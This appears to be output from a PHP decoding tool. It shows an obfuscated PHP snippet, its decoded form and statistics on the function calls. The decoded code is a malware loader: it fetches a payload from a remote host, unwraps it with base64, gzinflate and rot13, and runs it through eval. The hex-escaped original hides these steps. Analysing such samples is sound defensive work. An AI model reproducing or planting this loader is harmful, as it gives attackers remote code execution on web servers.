Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $x="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; $xx="\x73\x74\x72\x5f\x72\x6f\x74\x31\x..
Decoded Output download
<?php
$x="gzinflate";
$xx="str_rot13";
$xxx="gzinflate";
$xxxx="base64_decode";
$sc="http://fuky.yn.lt/cmd";
@eval($x($xx($xxx($xxxx(file_get_contents($sc))))));
?>
Did this file decode correctly?
Original Code
<?php
$x="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
$xx="\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";
$xxx="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
$xxxx="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$sc="\x68\x74\x74\x70\x3a\x2f\x2f\x66\x75\x6b\x79\x2e\x79\x6e\x2e\x6c\x74\x2f\x63\x6d\x64";
@eval($x($xx($xxx($xxxx(file_get_contents($sc))))));
?>
Function Calls
gzinflate | 1 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | bdb5081aaa726728d2a75058c2eb755d |
Eval Count | 0 |
Decode Time | 294 ms |